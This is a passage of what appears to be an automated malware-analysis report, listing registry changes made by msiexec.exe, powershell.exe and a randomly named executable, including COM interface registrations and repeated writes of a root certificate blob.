\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8D984A7E-B855-40B8-AB0C-44D3515B4528}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4376693C-CF37-453B-9289-3B0F521CAF27}\ = "IStateChangedEvent" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{5CA9E537-5A1D-43F1-6F27-6A0DB298A9A8}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{92F21DC0-44DE-1653-B717-2EBF0CA9B664}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A443DA5B-AA82-4720-BC84-BD097B2B13B8}\ = "IGuestAdditionsStatusChangedEvent" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{A5BBDB7D-8CE7-469F-A4C2-6476F581FF72} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{081FC833-C6FA-430E-6020-6A505D086387}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0FE2DA40-5637-472A-9736-72019EABD7DE}\NumMethods\ = "13" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{392F1DE4-80E1-4A8A-93A1-67C5F92A838A}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{97C78FCD-D4FC-485F-8613-5AF88BFCFCDC}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{CAC21692-7997-4595-A731-3A509DB604E5}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D7B98D2B-30E8-447E-99CB-E31BECAE6AE4}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{E8C25D4D-AC97-4C16-B3E2-81BD8A57CC27}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E8C25D4D-AC97-4C16-B3E2-81BD8A57CC27}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{0075FD6C-00C2-4484-0077-C057003D9C90} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{67C50AFE-3E78-11E9-B25E-7768F80C0E07}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D5ABC823-04D0-4DB6-8D66-DC2F033120E1}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C48F3401-4A9E-43F4-B7A7-54BD285E22F4}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00AE6AF4-00A7-4104-0009-49BC00B2DA80}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{E9A0C183-7071-4894-93D6-DCBEC010FA91}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00391758-00B1-4E9D-0000-11FA00F9D583}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6620DB85-44E0-CA69-E9E0-D4907CECCBE5}\ = "IGuestFsObjInfo" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{232E9151-AE84-4B8E-B0F3-5C20C35CAAC9} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6DDEF35E-4737-457B-99FC-BC52C851A44F}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{813C99FC-9849-4F47-813E-24A75DC85615}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{872DA645-4A9B-1727-BEE2-5585105B9EED}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{D37FE88F-0979-486C-BAA1-3ABB144DC82D}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{101AE042-1A29-4A19-92CF-02285773F3B5}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BB335CC-1C58-440C-BB7B-3A1397284C7B}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{88394258-7006-40D4-B339-472EE3801844}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D27C0B3D-6038-422C-B45E-6D4A0503D9F1}\ = "ISnapshotTakenEvent" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2405F0E5-6588-40A3-9B0A-68C05BA52C4B}\ = "IGuestProcessEvent" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4132147B-42F8-CD96-7570-6A8800E3342C}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4F4ADCF6-3E87-11E9-8AF2-576E84223953}\NumMethods\ = "36" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{4FDEBBF0-BE30-49C0-B315-E9749E1BDED1}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5748F794-48DF-438D-85EB-98FFD70D18C9}\ = "IMachineStateChangedEvent" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{70401EEF-C8E9-466B-9660-45CB3E9979E4}\NumMethods\ = "26" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C02F46D-C9D2-4F11-A384-53F0CF917214}\InprocServer32\ThreadingModel = "Free" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{46735DE7-F4C4-4020-A185-0D2881BCFA8B}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{92ED7B1A-0D96-40ED-AE46-A564D484325E}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{0075FD6C-00C2-4484-0077-C057003D9C90}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{22363CFC-07DA-41EC-AC4A-3DD99DB35594}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{678FBD9A-93AF-42A7-7F13-79AD6EF1A18D}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C984D15F-E191-400B-840E-970F3DAD7296}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D5ABC823-04D0-4DB6-8D66-DC2F033120E1}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CA2ADBA-8F30-401B-A8CD-FE31DBE839C0}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{101AE042-1A29-4A19-92CF-02285773F3B5} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{D947ADF5-4022-DC80-5535-6FB116815604}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E9A0C183-7071-4894-93D6-DCBEC010FA91}\ = "INetworkAdapter" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C48F3401-4A9E-43F4-B7A7-54BD285E22F4}\NumMethods\ = "15" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E062A915-3CF5-4C0A-BC90-9B8D4CC94D89}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{11BE93C7-A862-4DC9-8C89-BF4BA74A886A}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{35CF4B3F-4453-4F3E-C9B8-5686939C80B6} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE8A0EB5-F4F4-4DD0-9D30-C89B873247EC}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{CC830458-4974-A19C-4DC6-CC98C2269626}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{DAAF9016-1F04-4191-AA2F-1FAC9646AE4C}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CA2ADBA-8F30-401B-A8CD-FE31DBE839C0}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{435B66A2-0C60-11EA-A0EA-07EB0D1C4EAD}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4FDEBBF0-BE30-49C0-B315-E9749E1BDED1}\ = "INATNetwork" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4FDEBBF0-BE30-49C0-B315-E9749E1BDED1}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{22363CFC-07DA-41EC-AC4A-3DD99DB35594}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B0A0904D-2F05-4D28-855F-488F96BAD2B2}\TypeLib\Version = "1.3" msiexec.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 6Hu1t4TRKcdzy4v1abT8sdrW.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 6Hu1t4TRKcdzy4v1abT8sdrW.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 6Hu1t4TRKcdzy4v1abT8sdrW.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1db